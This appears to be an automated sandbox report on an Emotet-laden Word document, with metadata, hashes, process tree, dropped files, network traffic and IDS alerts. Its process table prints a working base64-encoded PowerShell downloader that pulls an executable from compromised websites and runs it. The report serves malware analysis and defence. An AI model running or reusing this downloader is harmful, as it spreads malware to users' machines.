File name: | DOCUMENTO-2019-HR_4905316.doc |
Full analysis: | https://app.any.run/tasks/70501a1d-134b-4cce-8541-9b2ff5dab631 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 14:48:10 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: methodical, Subject: directional, Author: Rossie Ullrich, Keywords: online, Comments: Small Steel Fish, Template: Normal.dotm, Last Saved By: Niko Schultz, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 14:30:00 2019, Last Saved Time/Date: Wed Oct 9 14:30:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 173, Security: 0 |
MD5: | B2941BA1901F23EB3BE707EF22173217 |
SHA1: | 8297267C862E8EE535FFD2C5B7D5A3DBBD42C51C |
SHA256: | 1E3239B3B1A51E5876877727082123611637AA6CB1BB91D3E4928D8BAD122FC2 |
SSDEEP: | 6144:7sJdGk8SrLkI07NSU4jJnUATfD9NcFQrQ7/4pm:7sJdGk8kX07NSU4VVP9NcFXQpm |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Mitchell |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 202 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Bahringer Inc |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 173 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:10:09 13:30:00 |
CreateDate: | 2019:10:09 13:30:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Niko Schultz |
Template: | Normal.dotm |
Comments: | Small Steel Fish |
Keywords: | online |
Author: | Rossie Ullrich |
Subject: | directional |
Title: | methodical |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2796 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOCUMENTO-2019-HR_4905316.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2740 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjAGMAOQAwADAAMAAwADcAYgAwADYAPQAnAHgAMAB4ADgAMgA4AGIAMgAwAHgAMAAnADsAJABiADMAMAAzAGMAMAAwAHgAYgAxADAAIAA9ACAAJwA5ADkANgAnADsAJAB4ADIAOAAzADQAMAAzADQAMQA4ADEAPQAnAGIANQA0ADUANAAzAGIAOQB4ADAANAAnADsAJAB4ADIAOQA2ADMAMAA2AGIAMwA0ADEAOQAwAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABiADMAMAAzAGMAMAAwAHgAYgAxADAAKwAnAC4AZQB4AGUAJwA7ACQAYwAwADAAYgAwADAANAA5ADAAMwA1ADYAPQAnAGMAMAAwADMANQA1ADYANwAwADMANgAnADsAJABiADAANAA5ADAAMQA5AGMAMgA1ADAAMQA2AD0AJgAoACcAbgAnACsAJwBlAHcALQAnACsAJwBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBiAGMAbABJAEUAbgB0ADsAJAB4ADUANgAzADUAMABjADAAMAA0ADAAMAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGIAcgBpAGQAYQBsAG0AZQBoAG4AZABpAHMAdAB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBlAGwAbAB2AHEAYQA2AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AbwBzAGgAdQBuAHYAaQByAGcAaQBuAGgAYQBpAHIAYwBvAC4AYwBvAG0ALwBjAG8AbQBwAGEAdABpAGIAaQBsAGkAdAB5AC8AeQBuADgAZgBqADAAMAA0ADEAOQAvAEAAaAB0AHQAcAA6AC8ALwB3AGkAcwBhAHQAbABhAGcAcgBhAG4AagBhAC4AYwBvAG0ALwA3AGIAaQBlAGMAMwAvAHUAbQA5AGoAMwA2ADAANgAvAEAAaAB0AHQAcAA6AC8ALwAzAGQAcwBoAGEAcgBwAGUAZABnAGUALgBjAG8AbQAvAGQAYgBjAG8AbgBuAGUAYwB0AC8AeAAzADgANgA5ADEANQAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHQAaABlAGMAcgBlAGUAawBwAHYALgBjAG8AbQAvAGYAdQBuAGMAdABpAG8AbgAuAHkAbwB1AGQALwBpAGoAMQAvACcALgAiAHMAYABQAGwASQB0ACIAKAAnAEAAJwApADsAJABiADMAYwAyADEANAB4AHgANgA1AGIAMAA9ACcAYgA4AGMAMAAwADEAMQAzADAAMQA4ADAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAHgANAAwADAANwA2ADQAMwAzADAAMwAgAGkAbgAgACQAeAA1ADYAMwA1ADAAYwAwADAANAAwADAAKQB7AHQAcgB5AHsAJABiADAANAA5ADAAMQA5AGMAMgA1ADAAMQA2AC4AIgBkAGAATwBXAG4AbABPAEEAYABEAEYAaQBgAEwAZQAiACgAJAB4ADQAMAAwADcANgA0ADMAMwAwADMALAAgACQAeAAyADkANgAzADAANgBiADMANAAxADkAMAApADsAJAB4AHgANwA2ADQAMwB4ADMAOAB4ADIAYgBjAD0AJwB4ADgANgAxAHgAYgAwADgANAA4ADIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJAB4ADIAOQA2ADMAMAA2AGIAMwA0ADEAOQAwACkALgAiAEwARQBgAE4ARwB0AGgAIgAgAC0AZwBlACAAMgA4ADkAMwAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABgAEEAcgB0ACIAKAAkAHgAMgA5ADYAMwAwADYAYgAzADQAMQA5ADAAKQA7ACQAYwA4ADIAMAAxADAANgAwADYANQAwADMAPQAnAHgAOAAwAGIAYgAxADcANwBiADkANAA5ADMAJwA7AGIAcgBlAGEAawA7ACQAYwBiADAAeAAwADkANAB4AGIAMAAzAD0AJwB4AGIAMwA5AHgAMAA2ADAAMABjADMAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiADYANwA2ADUAYwA5ADcAMwAwADIAPQAnAGMAOAA5AGMAOQA2AGMANQB4ADQAOAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR36E5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2740 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3LU63SH0GYKGOK0I26UZ.temp | — | |
MD5:— | SHA256:— | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1412667EC4865D044A7379F1850BD434 | SHA256:4360C33228182DCEE8E50380CCFC0671590C9F0CF07309D348293C231F1678E6 | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CCF24ED6.wmf | wmf | |
MD5:3D89CEAD755252D611181C1BD910BD32 | SHA256:B0628F4D8DBFF3169EC2D0E5DD6A676A94AA22045BB9CF539F3716CE405C923E | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A228E82.wmf | wmf | |
MD5:B4B71D08FEF9609A374B607B16131F66 | SHA256:551016BF128C59AC225ECCA3F91EE39396858331B65634D8535CD7AF488780A9 | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9345954.wmf | wmf | |
MD5:97D190F7A3C9B557A0004C3740CC0743 | SHA256:ED0FA66BF5C6F60F19619D29D0300F2537D0F65462C2A855B797FAF335280351 | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E409788.wmf | wmf | |
MD5:AB0BB61C56F3271BD2ACE3AECD8A076E | SHA256:DDBE05BFEF8D21C8DACB85DC358689228D62082094E73063F369A353100FDF9E | |||
2740 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:A670ADD3BF0A1901BD12CC7C4CD70086 | SHA256:98E5263D6949B8F81010D65760BB299D37BCF272CE0FFDF5668E2D5CC1545986 | |||
2740 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf5422.TMP | binary | |
MD5:A670ADD3BF0A1901BD12CC7C4CD70086 | SHA256:98E5263D6949B8F81010D65760BB299D37BCF272CE0FFDF5668E2D5CC1545986 | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43EB02E3.wmf | wmf | |
MD5:381C52C5F21C8DFB7E16E6767CBA1318 | SHA256:E7756DB3FE7055794DEC7777A6765A67A50D187EFE0762492AEE2E1573B6EA4A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2740 | powershell.exe | GET | — | 103.129.99.179:80 | http://www.bridalmehndistudio.com/wp-admin/ellvqa6/ | unknown | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2740 | powershell.exe | 103.129.99.179:80 | www.bridalmehndistudio.com | — | — | suspicious |
Domain | IP | Reputation |
---|---|---|
www.bridalmehndistudio.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2740 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2740 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2740 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2740 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |